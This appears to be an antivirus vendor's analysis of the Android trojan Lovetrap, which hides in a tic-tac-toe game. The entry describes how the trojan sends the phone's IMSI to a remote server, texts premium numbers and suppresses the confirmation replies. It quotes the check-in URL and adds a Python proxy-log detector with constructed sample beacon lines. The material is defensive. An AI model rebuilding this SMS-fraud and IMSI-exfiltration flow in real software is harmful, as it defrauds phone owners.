Mobile Virus

Android/Lovetrap.A!tr

Analysis

Android/Lovetrap.A!tr is a Trojan for mobile phones running Android. It looks like an innocent application (such as a tic-tac-toe game) but, in the background, it connects to a remote web site, gets a list of phone numbers from that web site, and then sends SMS messages to those phone numbers.
The phone numbers it sends SMS messages to typically correspond to value-added services and may not be free.


Technical Details


When the malicious sample is installed, a new icon for the "game" appears in the Application Launcher. The game looks genuine and works.

Figure 1. Tic tac toe game containing Android/Lovetrap.A!tr
But, in the background, the malware launches a service, an SMS receiver and a boot receiver.
Initially, the malware connects to a remote server, sending the victim's IMSI and an application ID (hard-coded to "LOVT"):
http://[REMOVED]/careu/positionrecorder.asmx/getS3?imsi=IMSI&appid=LOVT
Then, it contacts the server again to get a list of phone numbers.
The list is formatted as PHONENUMBER*BODY.
The malware will then send an SMS to that phone number, with the corresponding body.
Whenever the phone receives an SMS, the malware's SMS receiver handles the incoming message. For each incoming SMS, it retrieves the body of the SMS. If the body corresponds to one of the bodies it has already sent, it drops the SMS. If not, it checks the originating phone number of the SMS: if it corresponds to a phone number it has sent an SMS to, it drops the SMS too.
This SMS-dropping mechanism is assumed to remove bouncing or confirmation SMS messages.
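
The check-in request above leaves a recognizable trace in web proxy logs even though the host is redacted. The following is an added detection example, not part of the original analysis: it matches the request path and the "LOVT" application id and reports the client and leaked IMSI. The log format, host names, IP addresses and IMSI values are constructed, and case-insensitive path matching is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and hard-coded application id as given in the write-up above.
BEACON_PATH = "/careu/positionrecorder.asmx/gets3"  # compared in lower case (assumption)
APP_ID = "LOVT"
IMSI_RE = re.compile(r"^\d{6,15}$")  # an IMSI has at most 15 digits


def match_beacon(url):
    """Return the leaked IMSI if url looks like the check-in request, else None."""
    parts = urlsplit(url)
    if parts.path.rstrip("/").lower() != BEACON_PATH:
        return None
    query = {k.lower(): v for k, v in parse_qs(parts.query).items()}
    if APP_ID not in query.get("appid", []):
        return None
    imsi = query.get("imsi", [""])[0]
    # Keep the hit even if the IMSI is missing: path plus appid is specific enough.
    return imsi if IMSI_RE.match(imsi) else "unknown"


def scan(log_lines):
    """Return (client_ip, imsi) for each log line whose URL matches the check-in."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # not in the expected "time client method url" layout
        _ts, client, _method, url = fields[:4]
        imsi = match_beacon(url)
        if imsi is not None:
            hits.append((client, imsi))
    return hits


# Constructed sample proxy log: format, hosts, IPs and IMSIs are made up.
SAMPLE_LOG = [
    "2011-07-01T10:00:01Z 10.0.0.21 GET http://c2.example.invalid/careu/positionrecorder.asmx/getS3?imsi=001010123456789&appid=LOVT",
    "2011-07-01T10:00:05Z 10.0.0.22 GET http://www.example.invalid/index.html?appid=LOVT",
    "2011-07-01T10:00:09Z 10.0.0.23 GET http://c2.example.invalid/CareU/PositionRecorder.asmx/getS3?appid=LOVT&imsi=",
    "2011-07-01T10:00:12Z 10.0.0.24 GET http://c2.example.invalid/careu/positionrecorder.asmx/getS3?imsi=001010123456789&appid=GAME",
]

if __name__ == "__main__":
    for client, imsi in scan(SAMPLE_LOG):
        print(f"possible Lovetrap check-in from {client}, IMSI {imsi}")
```
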

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.